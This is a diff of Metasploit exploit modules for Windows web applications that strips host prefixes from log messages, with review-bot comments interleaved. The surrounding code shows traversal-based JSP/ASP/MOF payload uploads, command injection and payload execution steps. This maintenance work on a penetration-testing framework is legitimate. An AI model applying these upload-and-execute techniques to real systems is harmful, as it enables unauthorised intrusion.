#{tomcat_version} found") end - print_status("#{peer} - Verifying parameters to exploit the directory traversal...") + print_status("Verifying parameters to exploit the directory traversal...") brute_force = false location = "" location << install_path 
@@ -170,37 +170,37 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - print_good("#{peer} - Traversal parameters are correct") + print_good("Traversal parameters are correct") elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...") + print_error("Traversal parameters are incorrect, will try to brute force depth...") brute_force = true else fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters") end if brute_force - print_status("#{peer} - Trying to brute force the traversal depth...") + print_status("Trying to brute force the traversal depth...") depth = brute_force_depth(location) if depth.nil? fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH") end - print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...") + print_good("Using #{depth} as depth length to exploit the traversal...") end jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = upload_file(depth, location, jsp_name, payload.encoded) if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/ - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") + print_status("Executing payload 
on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', jsp_name), diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 4c5df23135..65ba7b2ac3 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -219,16 +219,16 @@ class Metasploit3 < Msf::Exploit::Remote locations.each {|location| asp_location = location + asp_name - print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...") + print_status("Uploading #{asp.length} bytes to #{location}...") res = upload(asp, asp_location) if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/ - print_good("#{peer} - ASP Payload successfully wrote to #{location}") + print_good("ASP Payload successfully wrote to #{location}") payload_url = asp_location break elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/ - print_error("#{peer} - Error probably due to permissions while writing to #{location}") + print_error("Error probably due to permissions while writing to #{location}") else - print_error("#{peer} - Unknown error while while writing to #{location}") + print_error("Unknown error while while writing to #{location}") end } @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing payload through #{payload_url}...") + print_status("Executing payload through #{payload_url}...") send_request_cgi({ 'uri' => payload_url}) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index e82552a092..ed9ddab692 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb 
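Review bot: The last status line of the `@@ -170,37` hunk in hp_loadrunner_copyfiletoserver.rb logs a different URI from the one requested. The message interpolates `normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)`, while the `send_request_cgi` call that follows uses `normalize_uri('ServiceEmulation', jsp_name)`. Anyone reconstructing the run from console output would look for the wrong path. Building the URI once and using it in both places keeps them in step: `jsp_uri = normalize_uri('ServiceEmulation', jsp_name)`, then `print_status("Executing payload on #{jsp_uri}...")` and `'uri' => jsp_uri`. The method continues past the end of the hunk.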
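Review bot: Two of the rewritten messages in hp_mpa_job_acct.rb (hunk `@@ -219,16`) keep wording slips that this pass over the strings could fix. `"Unknown error while while writing to #{location}"` repeats a word, and `"ASP Payload successfully wrote to #{location}"` uses the wrong verb form. Suggested: `print_error("Unknown error while writing to #{location}")` and `print_good("ASP payload successfully written to #{location}")`.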
@@ -115,19 +115,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 11ae035e25..40eb5cab67 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -113,19 +113,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index b5f8e8b7af..a221aebd55 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb 
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote session = get_authenticated_session_id(initial_session, redirect) csrf_token = get_csrf_token(session) - print_status("#{peer} - Executing payload") + print_status("Executing payload") random_mark = Rex::Text.rand_text_alpha(5 + rand(5)) res = send_request_cgi( { @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_initial_session_id - print_status("#{peer} - Retrieving an initial JSESSIONID...") + print_status("Retrieving an initial JSESSIONID...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'servlet', 'Main'), 'method' => 'POST' @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(session_id) - print_status("#{peer} - Authenticating on HP SiteScope Configuration...") + print_status("Authenticating on HP SiteScope Configuration...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path.to_s, 'j_security_check'), @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_authenticated_session_id(session_id, redirect) - print_status("#{peer} - Following redirection to finish authentication...") + print_status("Following redirection to finish authentication...") res = send_request_cgi( { @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_csrf_token(session) - print_status("#{peer} - Getting anti-CSRF token...") + print_status("Getting anti-CSRF token...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'jsp', 'tabs.jsp'), 'cookie' => session diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 61734310a5..9310991d96 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb 
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # The path to the injection is something like: # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index de50318045..1fcd7c1d38 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -110,20 +110,20 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{@exe_filename}") return true else - print_error("#{peer} - Upload failed...") + print_error("Upload failed...") return false end end def upload_and_run_jsp(filename, contents) - print_status("#{peer} - Getting a valid CSRF token...") + print_status("Getting a valid CSRF token...") csrf_token = get_upload_token fail_with(Failure::Unknown, "#{peer} - Unable to find the CSRF token") if csrf_token.empty? - print_status("#{peer} - Exploiting traversal to upload JSP dropper...") + print_status("Exploiting traversal to upload JSP dropper...") upload_file(filename, contents, csrf_token) - print_status("#{peer} - Executing the dropper...") + print_status("Executing the dropper...") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, filename), 
@@ -150,15 +150,15 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating EXE...") + print_status("Generating EXE...") exe = payload.encoded_exe @exe_filename = Rex::Text.rand_text_alpha(8) + ".exe" - print_status("#{peer} - Generating JSP dropper...") + print_status("Generating JSP dropper...") dropper = jsp_drop_and_execute(exe, @exe_filename) dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading and running JSP dropper...") + print_status("Uploading and running JSP dropper...") upload_and_run_jsp(dropper_filename, dropper) end diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index 00748d0456..a481ff4676 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(payload, path, filename, session_id) - print_status("#{peer} - Uploading payload to #{path}...") + print_status("Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) - print_status("#{peer} - Executing payload #{asp_name}") + print_status("Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index 2839baa385..ab0204bfc9 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb 
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("SystemTab", "uploadImage.asp") @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}") data = post_data.to_s - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ "method" => "POST", "uri" => normalize_uri("SystemTab", "uploadImage.asp"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@payload_name) - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(@payload_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index abe6834898..bac17e0e49 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx" - print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...") + print_status("Uploading #{asp.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, 
@@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]") + print_error("Upload failed on #{attack_url} [#{res.code} #{res.message}]") return end @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # EXECUTE # upload_path = uri_path + "ldlogon/#{upload_random}.asp" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code >= 300) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx" - print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...") + print_status("Deleting #{upload_path} through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -162,10 +162,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]") + print_error("Deletion failed at #{attack_url} [#{res.code} #{res.message}]") return end 
diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 44441df158..39c4b04f60 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" - print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") + print_status("Uploading info leak JSP #{jsp_name_leak}...") if upload_file(traversal_leak, jsp_leak) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end 
@@ -86,25 +86,25 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") end jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_payload = payload.encoded traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" - print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") + print_status("Uploading JSP payload #{jsp_payload_name}...") if upload_file(traversal_payload, jsp_payload) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload_name, 3) end diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 14391ebab3..18ae25b9b5 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine OpManager") + vprint_status("Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', 
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), @@ -109,14 +109,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 - print_status("#{peer} - Retrieved API key [ #{api_key} ]") + print_status("Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), 
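Review bot: `print_status("Retrieved API key [ #{api_key} ]")` in the `@@ -124,7` hunk of manage_engine_opmanager_rce.rb writes a live credential of the tested system to normal console output, which is commonly captured in saved logs and reports. Consider the verbose-only form, `vprint_status("Retrieved API key [ #{api_key} ]")`, and a plain `print_status("Retrieved API key")` at the default level. The `exploit` method extends beyond this hunk.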
diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 23aa9083fa..9fe3d101c1 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload(filename, filedata) - print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'") + print_status("Trying to upload '#{::File.basename(filename)}'") uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}") depth = "../" * (datastore['DEPTH'] + rand(10)) @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Exploit::Remote # upload exe exe_name = "WINDOWS/system32/#{fname}.exe" exe = generate_payload_exe - print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)") + print_status("Sending executable (#{exe.length.to_s} bytes)") upload(exe_name, exe) # upload mof mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)") + print_status("Sending MOF (#{mof.length.to_s} bytes)") upload(mof_name, mof) # list files to clean up diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index af793df59f..b70727e917 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote def check v = get_version - print_status("#{peer} - Detected version: #{v || 'Unknown'}") + print_status("Detected version: #{v || 'Unknown'}") if v.nil? return Exploit::CheckCode::Unknown 
@@ -133,19 +133,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit() begin - print_status("#{peer} - Checking application version...") + print_status("Checking application version...") v = get_version if v.nil? - print_error("#{peer} - Unable to detect version, abort!") + print_error("Unable to detect version, abort!") return end - print_good("#{peer} - Found Version #{v}") - print_status("#{peer} - Setting up poisoned session") + print_good("Found Version #{v}") + print_status("Setting up poisoned session") session_id,cmd = setup_session() - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") fname = upload_shell(session_id,cmd) - print_status("#{peer} - Executing payload") + print_status("Executing payload") exec_shell(session_id,cmd,fname) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index c9abd7bfad..7980ec25ae 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "WINDOWS\\system32\\#{@var_vbs_name}.vbs" - print_status("#{peer} - Uploading the VBS payload") + print_status("Uploading the VBS payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - VBS payload successfully uploaded") + print_status("VBS payload successfully uploaded") else - print_error("#{peer} - Failed to upload the VBS payload") + print_error("Failed to upload the VBS payload") return end 
@@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote soap_request << " </soapenv:Body>" soap_request << "</soapenv:Envelope>" - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") res = send_request_cgi( { @@ -204,9 +204,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - MOF file successfully uploaded") + print_status("MOF file successfully uploaded") else - print_error("#{peer} - Failed to upload the MOF file") + print_error("Failed to upload the MOF file") return end @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "\\server\\examples\\build\\mainWebApp\\#{@jsp_name}.jsp" - print_status("#{peer} - Uploading the JSP payload") + print_status("Uploading the JSP payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -249,13 +249,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - JSP payload successfully uploaded") + print_status("JSP payload successfully uploaded") else - print_error("#{peer} - Failed to upload the JSP payload") + print_error("Failed to upload the JSP payload") return end - print_status("#{peer} - Executing the uploaded JSP #{@jsp_name}.jsp ...") + print_status("Executing the uploaded JSP #{@jsp_name}.jsp ...") res = send_request_cgi( { 'uri' => "/#{@jsp_name}.jsp", diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index fd94612b71..3e8ce2702c 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb 
@@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote version = version_match[1] end - vprint_status("#{peer} - Version found: Oracle Endeca Server #{version}") + vprint_status("Version found: Oracle Endeca Server #{version}") if version =~ /7\.4\.0/ and version <= "7.4.0.787" return Exploit::CheckCode::Appears @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") execute_command(command) end diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 3a580df1fb..853c55c046 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb 
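Review bot: The context line `if version =~ /7\.4\.0/ and version <= "7.4.0.787"` in the `@@ -100,7 +100,7 @@` hunk compares version strings lexicographically, so a build number with more digits (constructed example: "7.4.0.1000") sorts before "7.4.0.787" and is reported as `Appears`. Comparing parsed versions avoids that false positive, e.g. `Gem::Version.new(version) <= Gem::Version.new('7.4.0.787')`, assuming `version` is always a dotted numeric string at this point. The regex is also unanchored, so it matches `7.4.0` anywhere in the string. The enclosing method starts and ends outside the hunk.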
@@ -86,22 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating payload and mof file...") + print_status("Generating payload and mof file...") mof_name = "#{rand_text_alpha(rand(5)+5)}.mof" exe_name = "#{rand_text_alpha(rand(5)+5)}.exe" exe_content = generate_payload_exe mof_content = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading the exe payload #{exe_name}...") + print_status("Uploading the exe payload #{exe_name}...") exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}" res = upload(exe_traversal, exe_content) unless res && res.code == 200 && res.body.blank? - print_error("#{peer} - Unexpected answer, trying anyway...") + print_error("Unexpected answer, trying anyway...") end register_file_for_cleanup(exe_name) - print_status("#{peer} - Uploading the MOF file #{mof_name}") + print_status("Uploading the MOF file #{mof_name}") mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}" upload(mof_traversal, mof_content) register_file_for_cleanup("wbem/mof/good/#{mof_name}") diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 7c24bcaf8f..41cbf1fae9 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, req) - print_status("#{peer} - Payload request received: #{req.uri}") + print_status("Payload request received: #{req.uri}") exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index ee531318fd..06dc9a7abb 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb 
@@ -381,7 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Testing command injection...") + print_status("Testing command injection...") res = send_request_cgi({ 'uri' => '/', @@ -453,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Injecting system commands...") + print_status("Injecting system commands...") res = send_request_cgi({ 'uri' => '/', @@ -466,9 +466,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.code == 500 and res.body =~ /Generic error/) - print_good("#{peer} - System command successfully injected") + print_good("System command successfully injected") else - print_error("#{peer} - Failed to inject system command") + print_error("Failed to inject system command") return end @@ -505,7 +505,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Executing injected command") + print_status("Executing injected command") res = send_request_cgi({ 'uri' => '/', @@ -518,7 +518,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 1) if res - print_error("#{peer} - Failed to execute injected command") + print_error("Failed to execute injected command") return end diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index a61073ba6b..bf935718d0 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -63,7 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 
@@ -89,7 +89,7 @@ class Metasploit4 < Msf::Exploit::Remote <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -110,7 +110,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") - print_status("#{peer} - Uploading JSP page to execute the payload...") + print_status("Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -131,7 +131,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") - print_status("#{peer} - Executing payload. Manual cleanup will be required.") + print_status("Executing payload. Manual cleanup will be required.") 